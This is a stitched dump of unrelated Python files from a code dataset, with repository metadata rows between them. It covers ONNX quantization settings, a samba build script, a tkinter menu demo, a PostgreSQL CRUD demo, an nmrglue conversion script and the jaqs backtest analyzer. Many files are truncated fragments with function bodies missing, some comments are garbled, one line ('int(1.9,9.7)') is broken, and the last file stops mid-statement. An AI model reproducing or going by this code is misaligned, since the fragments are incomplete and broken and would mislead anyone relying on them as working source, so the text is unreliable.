fix_top_level_trace_and_get_trace_func = mod.fix_top_level_trace_and_get_trace_func
# `version` is optional on older builds; default to 0 when absent.
version = getattr(mod, 'version', 0)
| 31.169811 | 107 | 0.725787 |
4677191c1771ec77d8d7c68a2a88766f05fcf790 | 2,843 | py | Python | tests/test_thumbnails.py | pypeclub/openpype4-tests | c0c32b643f63e66609772270fff71e88dcd5b922 | [
"Apache-2.0"
] | null | null | null | tests/test_thumbnails.py | pypeclub/openpype4-tests | c0c32b643f63e66609772270fff71e88dcd5b922 | [
"Apache-2.0"
] | null | null | null | tests/test_thumbnails.py | pypeclub/openpype4-tests | c0c32b643f63e66609772270fff71e88dcd5b922 | [
"Apache-2.0"
] | null | null | null | from tests.fixtures import api, PROJECT_NAME
assert api
THUMB_DATA1 = b"thisisaveryrandomthumbnailcontent"
THUMB_DATA2 = b"thisihbhihjhuuyiooanothbnlcontent"
| 23.890756 | 86 | 0.65248 |
4677247e7b07ffee44bb30042c587480349f229e | 914 | py | Python | POO/Heranca/aula107_classes.py | pinheirogus/Curso-Python-Udemy | d6d52320426172e924081b9df619490baa8c6016 | [
"MIT"
] | 1 | 2021-09-01T01:58:13.000Z | 2021-09-01T01:58:13.000Z | POO/Heranca/aula107_classes.py | pinheirogus/Curso-Python-Udemy | d6d52320426172e924081b9df619490baa8c6016 | [
"MIT"
] | null | null | null | POO/Heranca/aula107_classes.py | pinheirogus/Curso-Python-Udemy | d6d52320426172e924081b9df619490baa8c6016 | [
"MIT"
] | null | null | null | # Generalizando para no repetir o cdigo!
| 28.5625 | 100 | 0.63895 |
467742b9ee49da3193dfeffba9fb6976ebe7eb72 | 2,391 | py | Python | nncf/experimental/onnx/algorithms/quantization/default_quantization.py | vuiseng9/nncf_pytorch | c2b1f069c867327203629201aecae3b7815e7895 | [
"Apache-2.0"
] | 136 | 2020-06-01T14:03:31.000Z | 2020-10-28T06:10:50.000Z | nncf/experimental/onnx/algorithms/quantization/default_quantization.py | vuiseng9/nncf_pytorch | c2b1f069c867327203629201aecae3b7815e7895 | [
"Apache-2.0"
] | 133 | 2020-05-26T13:48:04.000Z | 2020-10-28T05:25:55.000Z | nncf/experimental/onnx/algorithms/quantization/default_quantization.py | vuiseng9/nncf_pytorch | c2b1f069c867327203629201aecae3b7815e7895 | [
"Apache-2.0"
] | 36 | 2020-05-28T08:18:39.000Z | 2020-10-27T14:46:58.000Z | """
Copyright (c) 2022 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from nncf.common.quantization.quantizer_propagation.structs import QuantizationTrait
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXConvolutionMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXLinearMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXSigmoidMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXHardSigmoidMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXAveragePoolMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXGlobalAveragePoolMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXAddLayerMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXMulLayerMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXConcatLayerMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXBatchNormMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXResizeMetatype
from nncf.experimental.onnx.graph.metatypes.onnx_ops import ONNXSoftmaxMetatype
from nncf.common.graph.operator_metatypes import UnknownMetatype
# Default mapping from quantization trait to the ONNX operator metatypes
# that carry that trait.
DEFAULT_ONNX_QUANT_TRAIT_TO_OP_DICT = {
    # Operations whose inputs are subject to quantization.
    QuantizationTrait.INPUTS_QUANTIZABLE: [
        ONNXConvolutionMetatype,
        ONNXLinearMetatype,
        ONNXAveragePoolMetatype,
        ONNXGlobalAveragePoolMetatype,
        ONNXAddLayerMetatype,
        ONNXMulLayerMetatype,
        ONNXBatchNormMetatype,
        ONNXHardSigmoidMetatype,
        ONNXResizeMetatype,
    ],
    # Operations excluded from quantization (plus unknown/unsupported ops).
    QuantizationTrait.NON_QUANTIZABLE: [ONNXSigmoidMetatype,
                                        ONNXSoftmaxMetatype,
                                        UnknownMetatype],
    # Concatenation has its own dedicated trait handling.
    QuantizationTrait.CONCAT: [ONNXConcatLayerMetatype],
    # No ops currently use output-as-weights quantization.
    QuantizationTrait.OUTPUT_QUANTIZATION_AS_WEIGHTS: []
}
| 49.8125 | 89 | 0.79632 |
46779bc59fb8e412188640c04f3538454363b415 | 13,483 | py | Python | Package/CONFIG.py | YuanYuLin/samba | ef8aaca2c539b0d241414e7f335b4ff939461558 | [
"MIT"
] | null | null | null | Package/CONFIG.py | YuanYuLin/samba | ef8aaca2c539b0d241414e7f335b4ff939461558 | [
"MIT"
] | null | null | null | Package/CONFIG.py | YuanYuLin/samba | ef8aaca2c539b0d241414e7f335b4ff939461558 | [
"MIT"
] | null | null | null | import ops
import iopc
TARBALL_FILE="samba-4.8.4.tar.gz"
TARBALL_DIR="samba-4.8.4"
INSTALL_DIR="samba-bin"
pkg_path = ""
output_dir = ""
tarball_pkg = ""
tarball_dir = ""
install_dir = ""
install_tmp_dir = ""
cc_host = ""
tmp_include_dir = ""
dst_include_dir = ""
dst_lib_dir = ""
dst_usr_local_lib_dir = ""
| 42.533123 | 112 | 0.705555 |
4677cd39827e65c98f0ade72fd58eb0f79b2c0cc | 671 | py | Python | packages/pyre/tracking/Chain.py | lijun99/pyre | 004dfd4c06489b4ba5b32877338ca6440f2d523b | [
"BSD-3-Clause"
] | 3 | 2019-08-02T21:02:47.000Z | 2021-09-08T13:59:43.000Z | packages/pyre/tracking/Chain.py | lijun99/pyre | 004dfd4c06489b4ba5b32877338ca6440f2d523b | [
"BSD-3-Clause"
] | null | null | null | packages/pyre/tracking/Chain.py | lijun99/pyre | 004dfd4c06489b4ba5b32877338ca6440f2d523b | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
#
# michael a.g. avzis
# orthologue
# (c) 1998-2019 all rights reserved
#
# declaration
# end of file
| 18.638889 | 88 | 0.593145 |
467ab5f703a873dbd5ce9a6760742fdfbfa8b614 | 30 | py | Python | tests/resources/accepted/res_0_minpyversion_3_0.py | matteogabburo/python-ast-utils | 5069e9e53e8ed1f5305167254139b95967102aeb | [
"MIT"
] | 3 | 2020-12-22T10:43:39.000Z | 2021-01-01T16:42:32.000Z | tests/resources/accepted/res_0_minpyversion_3_0.py | matteogabburo/python-ast-utils | 5069e9e53e8ed1f5305167254139b95967102aeb | [
"MIT"
] | null | null | null | tests/resources/accepted/res_0_minpyversion_3_0.py | matteogabburo/python-ast-utils | 5069e9e53e8ed1f5305167254139b95967102aeb | [
"MIT"
] | null | null | null | import os
x = 7
print(x + 1)
| 6 | 12 | 0.566667 |
467b69ecaf5ca591ddc3465f82457df4ea005caa | 448 | py | Python | Mod 03/03 Prova.py | SauloCav/CN | e8de20dbcf1b3ff043743728b7dde2eff1ae8f87 | [
"MIT"
] | null | null | null | Mod 03/03 Prova.py | SauloCav/CN | e8de20dbcf1b3ff043743728b7dde2eff1ae8f87 | [
"MIT"
] | null | null | null | Mod 03/03 Prova.py | SauloCav/CN | e8de20dbcf1b3ff043743728b7dde2eff1ae8f87 | [
"MIT"
] | null | null | null | #! /usr/bin/env python3
# -*- coding: utf-8 -*-
import math
print(int(1.9,9.7))
| 18.666667 | 58 | 0.504464 |
467ea3052543109008b133a68620b40cb725a84a | 2,055 | py | Python | almetro/al.py | arnour/almetro | 7d00b1bb746b49dc9dd464395abdf4fe93f028fe | [
"Apache-2.0"
] | null | null | null | almetro/al.py | arnour/almetro | 7d00b1bb746b49dc9dd464395abdf4fe93f028fe | [
"Apache-2.0"
] | 1 | 2019-08-21T23:02:49.000Z | 2019-08-21T23:02:49.000Z | almetro/al.py | arnour/almetro | 7d00b1bb746b49dc9dd464395abdf4fe93f028fe | [
"Apache-2.0"
] | null | null | null | from almetro.instance import growing
from almetro.metro import Metro
import timeit
| 34.830508 | 139 | 0.685158 |
467fe487527b89370f3c2d1bfc1b416969557a05 | 31,434 | py | Python | yt_dlp/extractor/archiveorg.py | mrBliss/yt-dlp | aecd021656b672dbb617e5bae54a8986f9c4ebaf | [
"Unlicense"
] | 80 | 2021-05-25T11:33:49.000Z | 2022-03-29T20:36:53.000Z | yt_dlp/extractor/archiveorg.py | mrBliss/yt-dlp | aecd021656b672dbb617e5bae54a8986f9c4ebaf | [
"Unlicense"
] | 53 | 2017-04-12T19:53:18.000Z | 2022-02-22T10:33:13.000Z | yt_dlp/extractor/archiveorg.py | mrBliss/yt-dlp | aecd021656b672dbb617e5bae54a8986f9c4ebaf | [
"Unlicense"
] | 22 | 2021-05-07T05:01:27.000Z | 2022-03-26T19:10:54.000Z | # coding: utf-8
from __future__ import unicode_literals
import re
import json
from .common import InfoExtractor
from .youtube import YoutubeIE, YoutubeBaseInfoExtractor
from ..compat import (
compat_urllib_parse_unquote,
compat_urllib_parse_unquote_plus,
compat_HTTPError
)
from ..utils import (
bug_reports_message,
clean_html,
dict_get,
extract_attributes,
ExtractorError,
get_element_by_id,
HEADRequest,
int_or_none,
KNOWN_EXTENSIONS,
merge_dicts,
mimetype2ext,
orderedSet,
parse_duration,
parse_qs,
str_to_int,
str_or_none,
traverse_obj,
try_get,
unified_strdate,
unified_timestamp,
urlhandle_detect_ext,
url_or_none
)
| 46.776786 | 213 | 0.558822 |
4680d6848613dfb9b8af98b8d4dd6e1f33bd4389 | 1,008 | py | Python | Interfas Grafica XI (GUI)/InterfasGraficaXI.py | BrianMarquez3/Python-Course | 2622b4ddfd687505becfd246e82a2ed0cb9b76f3 | [
"MIT"
] | 20 | 2020-08-19T23:27:01.000Z | 2022-02-03T12:02:17.000Z | Interfas Grafica XI (GUI)/InterfasGraficaXI.py | BrianMarquez3/Python-Course | 2622b4ddfd687505becfd246e82a2ed0cb9b76f3 | [
"MIT"
] | 1 | 2021-04-10T18:06:05.000Z | 2021-04-10T18:06:05.000Z | Interfas Grafica XI (GUI)/InterfasGraficaXI.py | BrianMarquez3/Python-Course | 2622b4ddfd687505becfd246e82a2ed0cb9b76f3 | [
"MIT"
] | 2 | 2020-12-03T19:35:36.000Z | 2021-11-10T14:58:39.000Z | # Interfas Grafica XI
# Menu
# Build a window whose menu bar has Archivo/Edicion/Herramienta/Ayuda menus.
from tkinter import *
root=Tk()
barraMenu=Menu(root)
root.config(menu=barraMenu, width=600, height=400)
# "Archivo" (File) menu entries; tearoff=0 removes the dashed tear-off row.
archivoMenu=Menu(barraMenu, tearoff=0)
archivoMenu.add_command(label="Nuevo")
archivoMenu.add_command(label="Guardar")
archivoMenu.add_command(label="Guardar Como")
archivoMenu.add_separator()
archivoMenu.add_command(label="Cerrar")
archivoMenu.add_command(label="Salir")
# "Edicion" (Edit) and "Herramienta" (Tools) menus.
archivoEdicion=Menu(barraMenu, tearoff=0)
# NOTE(review): unlike its siblings, this menu omits tearoff=0 and so will
# show a tear-off entry -- confirm whether that is intended.
archivoHerramientas=Menu(barraMenu)
archivoEdicion.add_command(label="Copiar")
archivoEdicion.add_command(label="Cortar")
archivoEdicion.add_command(label="Pegar")
# "Ayuda" (Help) menu; its commands are added after the cascades below.
archivoAyuda=Menu(barraMenu, tearoff=0)
# Attach every drop-down menu to the menu bar.
barraMenu.add_cascade(label="Archivo", menu=archivoMenu)
barraMenu.add_cascade(label="Edicion", menu=archivoEdicion)
barraMenu.add_cascade(label="Herramienta", menu=archivoHerramientas)
barraMenu.add_cascade(label="Ayuda", menu=archivoAyuda)
archivoAyuda.add_command(label="Licencia")
archivoAyuda.add_command(label="Acerca de...")
root.mainloop() | 28 | 68 | 0.8125 |
46812ee3bdef976af898f29d2c99337fc3788ea0 | 91 | py | Python | virtual/lib/python3.6/site-packages/macaroonbakery/tests/__init__.py | marknesh/pitches | 0a480d9bc2beafaefa0121393b1502cc05edab89 | [
"MIT"
] | null | null | null | virtual/lib/python3.6/site-packages/macaroonbakery/tests/__init__.py | marknesh/pitches | 0a480d9bc2beafaefa0121393b1502cc05edab89 | [
"MIT"
] | 11 | 2020-06-05T20:57:31.000Z | 2021-09-22T18:35:03.000Z | flask/lib/python3.6/site-packages/macaroonbakery/tests/__init__.py | JOFLIX/grapevines | 34576e01184570d79cc140b42ffb71d322132da6 | [
"MIT",
"Unlicense"
] | 1 | 2020-11-04T06:48:34.000Z | 2020-11-04T06:48:34.000Z | # Copyright 2017 Canonical Ltd.
# Licensed under the LGPLv3, see LICENCE file for details.
| 30.333333 | 58 | 0.78022 |
4681cb44945ca44b04cb55846c39c0d1d3ca721a | 5,589 | py | Python | 08/postgresql_demo.py | catcherwong-archive/2019 | f9672920113b1ec0a5fcd6a6bde681f62d805763 | [
"MIT"
] | 27 | 2019-04-07T15:31:53.000Z | 2021-08-28T16:18:34.000Z | 08/postgresql_demo.py | hca1120/2019 | 09e5f49407b8239409e857f8117877eedb6b0134 | [
"MIT"
] | 5 | 2019-08-10T08:19:28.000Z | 2022-02-11T02:38:41.000Z | 08/postgresql_demo.py | hca1120/2019 | 09e5f49407b8239409e857f8117877eedb6b0134 | [
"MIT"
] | 31 | 2019-04-07T15:31:57.000Z | 2022-02-02T20:36:58.000Z | # -*- coding: UTF-8 -*-
import psycopg2 #postgresql
import time
import datetime
if __name__ == "__main__":
    # Smoke-test driver for the PgDemo helper class (defined elsewhere in the
    # original file; not visible in this excerpt). Connects to a local
    # PostgreSQL instance and exercises each CRUD method in turn.
    # NOTE(review): credentials are hard-coded — fine for a demo, never for
    # production code.
    pg = PgDemo("127.0.0.1", 5432, "demo", "postgres", "123456")
    print("===========insert_one==============")
    pg.insert_one("wong", 1)
    print("===========query_all==============")
    pg.query_all()
    print("===========query_lastone==============")
    pg.query_lastone()
    print("===========query_byname==============")
    pg.query_byname("catcher")
    print("===========update_genderbyid==============")
    pg.update_genderbyid(4, 2)
    print("===========delete_byname==============")
    pg.delete_byname("wong")
    print("===========query_all==============")
    pg.query_all()
| 35.598726 | 138 | 0.429236 |
46820f0e1937a8a50c1292d89054f263875a439f | 686 | py | Python | examples/convert/pipe2sparky_2d.py | thegooglecodearchive/nmrglue | 34ffb5247f457c19b93c584e048df4042dea0482 | [
"BSD-3-Clause"
] | 1 | 2019-04-22T06:08:13.000Z | 2019-04-22T06:08:13.000Z | examples/convert/pipe2sparky_2d.py | thegooglecodearchive/nmrglue | 34ffb5247f457c19b93c584e048df4042dea0482 | [
"BSD-3-Clause"
] | null | null | null | examples/convert/pipe2sparky_2d.py | thegooglecodearchive/nmrglue | 34ffb5247f457c19b93c584e048df4042dea0482 | [
"BSD-3-Clause"
] | null | null | null | #! /usr/bin/env python
# Conversion smoke test (Python 2 syntax: bare `print` statements).
# Converts a 2D NMRPipe spectrum to Sparky format with nmrglue, then compares
# the written file against a reference Sparky file.
import nmrglue as ng
# read in the NMRPipe data (ng.pipe.read; the file is a processed .ft2 spectrum)
dic,data = ng.pipe.read("../common_data/2d_pipe/test.ft2")
# guess a universal dictionary of spectral parameters from the pipe data
u = ng.pipe.guess_udic(dic,data)
# create the converter object and initialize it with the pipe data
C = ng.convert.converter()
C.from_pipe(dic,data,u)
# write the spectrum out in Sparky (.ucsf) format
ng.sparky.write("2d_sparky.ucsf",*C.to_sparky(),overwrite=True)
# check the conversion against the NMRPipe-derived reference
print "Conversion complete, listing differences between files:"
sdic,sdata = ng.sparky.read("2d_sparky.ucsf")
sdic2,sdata2 = ng.sparky.read("../common_data/2d_sparky/data.ucsf")
print ng.misc.pair_similar(sdic,sdata,sdic2,sdata2,verb=True)
| 29.826087 | 67 | 0.759475 |
46821c4a15686b2fb3b7ea49bee70f910667b4c7 | 36,931 | py | Python | jaqs/trade/analyze/analyze.py | WayneWan413/JAQS | e7362fc261f49dd7a4353c9a9a3f98d6ef9a78b4 | [
"Apache-2.0"
] | null | null | null | jaqs/trade/analyze/analyze.py | WayneWan413/JAQS | e7362fc261f49dd7a4353c9a9a3f98d6ef9a78b4 | [
"Apache-2.0"
] | null | null | null | jaqs/trade/analyze/analyze.py | WayneWan413/JAQS | e7362fc261f49dd7a4353c9a9a3f98d6ef9a78b4 | [
"Apache-2.0"
] | null | null | null | # encoding: utf-8
from __future__ import print_function
import os
import json
from collections import OrderedDict
import numpy as np
import pandas as pd
import matplotlib as mpl
import matplotlib.pyplot as plt
from matplotlib.ticker import Formatter
from jaqs.trade.analyze.report import Report
from jaqs.data import RemoteDataService
from jaqs.data.basic.instrument import InstManager
from jaqs.trade import common
import jaqs.util as jutil
STATIC_FOLDER = jutil.join_relative_path("trade/analyze/static")
TO_PCT = 100.0
MPL_RCPARAMS = {'figure.facecolor': '#F6F6F6',
'axes.facecolor': '#F6F6F6',
'axes.edgecolor': '#D3D3D3',
'text.color': '#555555',
'grid.color': '#B1B1B1',
'grid.alpha': 0.3,
# scale
'axes.linewidth': 2.0,
'axes.titlepad': 12,
'grid.linewidth': 1.0,
'grid.linestyle': '-',
# font size
'font.size': 13,
'axes.titlesize': 18,
'axes.labelsize': 14,
'legend.fontsize': 'small',
'lines.linewidth': 2.5,
}
    def _init_inst_data(self):
        """Build ``self.inst_map`` (symbol -> instrument-attribute dict).

        Prefers the dataview's instrument table; falls back to querying the
        data API via ``InstManager``. Raises ``ValueError`` if neither a
        dataview nor a data API is available.
        """
        symbol_str = ','.join(self.universe)
        if self.dataview is not None:
            # data_inst is indexed by symbol; to_dict(orient='index') gives
            # {symbol: {column: value, ...}}.
            data_inst = self.dataview.data_inst
            self.inst_map = data_inst.to_dict(orient='index')
        elif self.data_api is not None:
            inst_mgr = InstManager(data_api=self.data_api, symbol=symbol_str)
            # Flatten Instrument objects into plain attribute dicts.
            self.inst_map = {k: v.__dict__ for k, v in inst_mgr.inst_map.items()}
            del inst_mgr
        else:
            raise ValueError("no dataview or dataapi provided.")
    def _init_trades(self, df):
        """Store the trade records.

        Adds a combined ``fill_dt`` datetime column (from ``fill_date`` +
        ``fill_time``), then indexes and sorts the frame by
        ``(symbol, fill_dt)`` before saving it to ``self._trades``.
        """
        df.loc[:, 'fill_dt'] = jutil.combine_date_time(df.loc[:, 'fill_date'], df.loc[:, 'fill_time'])
        df = df.set_index(['symbol', 'fill_dt']).sort_index(axis=0)
        # self._trades = jutil.group_df_to_dict(df, by='symbol')
        self._trades = df
    def _init_symbol_price(self):
        """Fetch close prices (raw and adjusted) for the universe.

        Results are stored as date-by-symbol DataFrames in ``self._closes``
        and ``self._closes_adj``. Uses the dataview when available, otherwise
        queries the data API directly.
        """
        if self.dataview is not None:
            df_close = self.dataview.get_ts('close', start_date=self.start_date, end_date=self.end_date)
            df_close_adj = self.dataview.get_ts('close_adj', start_date=self.start_date, end_date=self.end_date)
        else:
            df, msg = self.data_api.daily(symbol=','.join(self.universe), fields='trade_date,symbol,close',
                                          start_date=self.start_date, end_date=self.end_date)
            if msg != '0,':
                # '0,' is the API's success code; anything else is an error message.
                print(msg)
            df_close = df.pivot(index='trade_date', columns='symbol', values='close')
            # NOTE(review): this second request is identical to the first
            # (same 'close' field, no adjust mode), so on this code path
            # _closes_adj equals _closes — confirm whether an adjusted
            # price field was intended here.
            df_adj, msg = self.data_api.daily(symbol=','.join(self.universe), fields='trade_date,symbol,close',
                                              start_date=self.start_date, end_date=self.end_date)
            if msg != '0,':
                print(msg)
            df_close_adj = df_adj.pivot(index='trade_date', columns='symbol', values='close')
        self._closes = df_close
        self._closes_adj = df_close_adj
    def _init_universe(self, securities):
        """Store the given securities as a set in ``self._universe``."""
        self._universe = set(securities)
    def _init_configs(self, folder):
        """Load ``configs.json`` from *folder* into ``self._configs``.

        Also caches the frequently-used ``init_balance``, ``start_date`` and
        ``end_date`` entries as instance attributes.
        """
        import codecs
        with codecs.open(os.path.join(folder, 'configs.json'), 'r', encoding='utf-8') as f:
            configs = json.load(f)
        self._configs = configs
        self.init_balance = self.configs['init_balance']
        self.start_date = self.configs['start_date']
        self.end_date = self.configs['end_date']
'''
def get_daily(self):
"""Add various statistics to daily DataFrame."""
self.daily = self._get_daily(self.closes, self.trades)
daily_dic = dict()
for sec, df_trade in self.trades.items():
df_close = self.closes[sec].rename('close')
res = self._get_daily(df_close, df_trade)
daily_dic[sec] = res
self.daily = daily_dic
'''
    def gen_report(self, source_dir, template_fn, out_folder='.', selected=None):
        """
        Generate HTML (and PDF) report of the trade analysis.
        Parameters
        ----------
        source_dir : str
            path of directory where HTML template and css files are stored.
        template_fn : str
            File name of HTML template.
        out_folder : str
            Output folder of report.
        selected : list of str or None
            List of symbols whose detailed PnL curve and position will be plotted.
        # TODO: this parameter should not belong to function
        """
        # Assemble the template context from previously computed analysis results.
        dic = dict()
        dic['html_title'] = "Alpha Strategy Backtest Result"
        dic['selected_securities'] = selected
        # we do not want to show username / password in report
        dic['props'] = {k: v for k, v in self.configs.items() if ('username' not in k and 'password' not in k)}
        dic['performance_metrics'] = self.performance_metrics
        dic['risk_metrics'] = self.risk_metrics
        dic['position_change'] = self.position_change
        dic['account'] = self.account
        dic['df_daily'] = jutil.group_df_to_dict(self.daily, by='symbol')
        dic['daily_position'] = self.daily_position
        self.report_dic.update(dic)
        # Persist the returns series next to the report for later inspection.
        self.returns.to_csv(os.path.join(out_folder, 'returns.csv'))
        r = Report(self.report_dic, source_dir=source_dir, template_fn=template_fn, out_folder=out_folder)
        r.generate_html()
        r.output_html('report.html')
class EventAnalyzer(BaseAnalyzer):
class AlphaAnalyzer(BaseAnalyzer):
'''
def get_returns_OLD(self, compound_return=True, consider_commission=True):
profit_col_name = 'CumProfitComm' if consider_commission else 'CumProfit'
vp_list = {sec: df_profit.loc[:, profit_col_name] for sec, df_profit in self.daily.items()}
df_profit = pd.concat(vp_list, axis=1) # this is cumulative profit
# TODO temperary solution
df_profit = df_profit.fillna(method='ffill').fillna(0.0)
strategy_value = df_profit.sum(axis=1) + self.configs['init_balance']
market_values = pd.concat([strategy_value, self.data_benchmark], axis=1).fillna(method='ffill')
market_values.columns = ['strat', 'bench']
df_returns = market_values.pct_change(periods=1).fillna(0.0)
df_returns = df_returns.join((df_returns.loc[:, ['strat', 'bench']] + 1.0).cumprod(), rsuffix='_cum')
if compound_return:
df_returns.loc[:, 'active_cum'] = df_returns['strat_cum'] - df_returns['bench_cum'] + 1
df_returns.loc[:, 'active'] = df_returns['active_cum'].pct_change(1).fillna(0.0)
else:
df_returns.loc[:, 'active'] = df_returns['strat'] - df_returns['bench']
df_returns.loc[:, 'active_cum'] = df_returns['active'].add(1.0).cumprod(axis=0)
start = pd.to_datetime(self.configs['start_date'], format="%Y%m%d")
end = pd.to_datetime(self.configs['end_date'], format="%Y%m%d")
years = (end - start).days / 365.0
self.metrics['yearly_return'] = np.power(df_returns.loc[:, 'active_cum'].values[-1], 1. / years) - 1
self.metrics['yearly_vol'] = df_returns.loc[:, 'active'].std() * np.sqrt(225.)
self.metrics['beta'] = np.corrcoef(df_returns.loc[:, 'bench'], df_returns.loc[:, 'strat'])[0, 1]
self.metrics['sharpe'] = self.metrics['yearly_return'] / self.metrics['yearly_vol']
# bt_strat_mv = pd.read_csv('bt_strat_mv.csv').set_index('trade_date')
# df_returns = df_returns.join(bt_strat_mv, how='right')
self.returns = df_returns
'''
    def _brinson(self, close, pos, index_weight, group):
        """
        Brinson Attribution.
        Decomposes the portfolio's active return versus the index into
        allocation, selection and interaction components per group.
        Parameters
        ----------
        close : pd.DataFrame
            Index is date, columns are symbols.
        pos : pd.DataFrame
            Index is date, columns are symbols.
        index_weight : pd.DataFrame
            Index is date, columns are symbols.
        group : pd.DataFrame
            Index is date, columns are symbols.
        Returns
        -------
        dict
            'df_brinson' (per-date decomposition), 'allocation' and
            'selection' (per-date, per-group contributions).
        """
        ret = close.pct_change(1)
        # Portfolio weights: position value normalized by total; dates with a
        # zero total position get zero weight instead of NaN from division.
        pos_sum = pos.sum(axis=1)
        pf_weight = pos.div(pos_sum, axis=0)
        pf_weight.loc[pos_sum == 0, :] = 0.0
        assert pf_weight.isnull().sum().sum() == 0
        pf_weight = pf_weight.reindex(index=ret.index, columns=ret.columns)
        pf_weight = pf_weight.fillna(0.0)
        weighted_ret_pf = ret.mul(pf_weight)
        weighted_ret_index = ret.mul(index_weight)
        # group_sum is a module-level helper (defined elsewhere in this file);
        # presumably it aggregates symbol columns into group columns — verify.
        index_group_weight = group_sum(index_weight, group)
        pf_group_weight = group_sum(pf_weight, group)
        pf_group_ret = group_sum(weighted_ret_pf, group).div(pf_group_weight)
        index_group_ret = group_sum(weighted_ret_index, group).div(index_group_weight)
        # Allocation: over/under-weighting groups times the index group return.
        allo_ret_group = (pf_group_weight - index_group_weight).mul(index_group_ret)
        allo_ret = allo_ret_group.sum(axis=1)
        # Selection: picking better symbols within a group, at index weights.
        selection_ret_group = (pf_group_ret - index_group_ret).mul(index_group_weight)
        selection_ret = selection_ret_group.sum(axis=1)
        active_ret = (weighted_ret_pf.sum(axis=1) - weighted_ret_index.sum(axis=1))
        # Interaction is the remainder of active return not explained above.
        inter_ret = active_ret - selection_ret - allo_ret
        df_brinson = pd.DataFrame(index=allo_ret.index,
                                  data={'allocation': allo_ret,
                                        'selection': selection_ret,
                                        'interaction': inter_ret,
                                        'total_active': active_ret})
        return {'df_brinson': df_brinson, 'allocation': allo_ret_group, 'selection': selection_ret_group}
    def brinson(self, group):
        """
        Run Brinson attribution for the portfolio and store/plot the result.
        Parameters
        ----------
        group : str or pd.DataFrame
            If group is string, this function will try to fetch the corresponding DataFrame from DataView.
            If group is pd.DataFrame, it will be used as-is.
        Returns
        -------
        None
            Side effects: sets ``self.df_brinson``, adds it to
            ``self.report_dic`` and saves a plot to ``self.file_folder``.
        """
        if isinstance(group, str):
            group = self.dataview.get_ts(group, start_date=self.start_date, end_date=self.end_date)
        elif isinstance(group, pd.DataFrame):
            pass
        else:
            raise ValueError("Group must be string or DataFrame. But {} is provided.".format(group))
        if group is None or group.empty:
            raise ValueError("group is None or group is empty")
        close = self.closes_adj
        pos = self.daily_position
        # _get_index_weight is defined elsewhere in the original file.
        index_weight = self._get_index_weight()
        res_dic = self._brinson(close, pos, index_weight, group)
        df_brinson = res_dic['df_brinson']
        self.df_brinson = df_brinson
        self.report_dic['df_brinson'] = df_brinson
        plot_brinson(df_brinson, save_folder=self.file_folder)
def plot_daily_trading_holding_pnl(trading, holding, total, total_cum):
    """
    Plot daily total / trading / holding PnL as three stacked bar charts,
    with cumulative PnL overlaid on the first panel's twin axis.
    Parameters
    ----------
    trading, holding, total, total_cum : pd.Series
        Daily trading PnL, holding PnL, total PnL and cumulative total PnL,
        all indexed by date.
    Returns
    -------
    matplotlib.figure.Figure
    """
    idx0 = total.index
    n = len(idx0)
    # Plot against integer positions so non-trading days leave no gaps;
    # MyFormatter (defined elsewhere in this file) maps positions back to dates.
    idx = np.arange(n)
    fig, (ax0, ax2, ax3) = plt.subplots(3, 1, figsize=(16, 13.5), sharex=True)
    ax1 = ax0.twinx()
    bar_width = 0.4
    # Red bars for profit, green for loss (CN market color convention).
    profit_color, lose_color = '#D63434', '#2DB635'
    curve_color = '#174F67'
    y_label = 'Profit / Loss ($)'
    color_arr_raw = np.array([profit_color] * n)
    color_arr = color_arr_raw.copy()
    color_arr[total < 0] = lose_color
    ax0.bar(idx, total, width=bar_width, color=color_arr)
    ax0.set(title='Daily PnL', ylabel=y_label, xlim=[-2, n+2],)
    ax0.xaxis.set_major_formatter(MyFormatter(idx0, '%y-%m-%d'))
    ax1.plot(idx, total_cum, lw=1.5, color=curve_color)
    ax1.set(ylabel='Cum. ' + y_label)
    ax1.yaxis.label.set_color(curve_color)
    color_arr = color_arr_raw.copy()
    color_arr[trading < 0] = lose_color
    ax2.bar(idx-bar_width/2, trading, width=bar_width, color=color_arr)
    ax2.set(title='Daily Trading PnL', ylabel=y_label)
    color_arr = color_arr_raw.copy()
    color_arr[holding < 0] = lose_color
    ax3.bar(idx+bar_width/2, holding, width=bar_width, color=color_arr)
    ax3.set(title='Daily Holding PnL', ylabel=y_label, xticks=idx[: : n//10])
    return fig
def plot_portfolio_bench_pnl(portfolio_cum_ret, benchmark_cum_ret, excess_cum_ret):
    """
    Plot cumulative returns of strategy vs. benchmark (top panel) and the
    cumulative excess return (bottom panel).
    Parameters
    ----------
    portfolio_cum_ret, benchmark_cum_ret, excess_cum_ret : pd.Series
        Cumulative return factors (1.0 = no change), indexed by date.
    Returns
    -------
    matplotlib.figure.Figure
    """
    fig, (ax1, ax2) = plt.subplots(2, 1, figsize=(16, 9), sharex=True)
    idx_dt = portfolio_cum_ret.index
    # Integer x positions; MyFormatter maps them back to date labels.
    idx = np.arange(len(idx_dt))
    y_label_ret = "Cumulative Return (%)"
    # Cumulative factors are converted to percent gains via (x - 1) * 100.
    ax1.plot(idx, (benchmark_cum_ret-1) * TO_PCT, label='Benchmark', color='#174F67')
    ax1.plot(idx, (portfolio_cum_ret-1) * TO_PCT, label='Strategy', color='#198DD6')
    ax1.legend(loc='upper left')
    ax1.set(title="Absolute Return of Portfolio and Benchmark",
            #xlabel="Date",
            ylabel=y_label_ret)
    ax1.grid(axis='y')
    ax2.plot(idx, (excess_cum_ret-1) * TO_PCT, label='Extra Return', color='#C37051')
    ax2.set(title="Excess Return Compared to Benchmark", ylabel=y_label_ret
